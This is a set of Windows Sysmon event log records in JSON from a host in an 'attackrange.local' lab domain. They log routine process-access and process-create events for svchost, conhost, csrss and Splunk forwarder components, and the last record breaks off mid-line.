{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.054\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020A-5F25-0000-001072DD0400}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.054","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020A-5F25-0000-001072DD0400}","TargetProcessId":"4228","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.179\r\nSourceProcessGUID: {A837DB8D-020A-5F25-0000-001072DD0400}\r\nSourceProcessId: 4228\r\nSourceThreadId: 4196\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.179","SourceProcessGUID":"{A837DB8D-020A-5F25-0000-001072DD0400}","SourceProcessId":"4228","SourceThreadId":"4196","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.931\r\nProcessGuid: {A837DB8D-020A-5F25-0000-001052DF0400}\r\nProcessId: 4508\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.931","ProcessGuid":"{A837DB8D-020A-5F25-0000-001052DF0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2737,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-020A-5F25-0000-001052DF0400}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-020A-5F25-0000-001052DF0400}","TargetProcessId":"4508","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2738,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020A-5F25-0000-001052DF0400}\r\nTargetProcessId: 4508\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020A-5F25-0000-001052DF0400}","TargetProcessId":"4508","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2739,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYST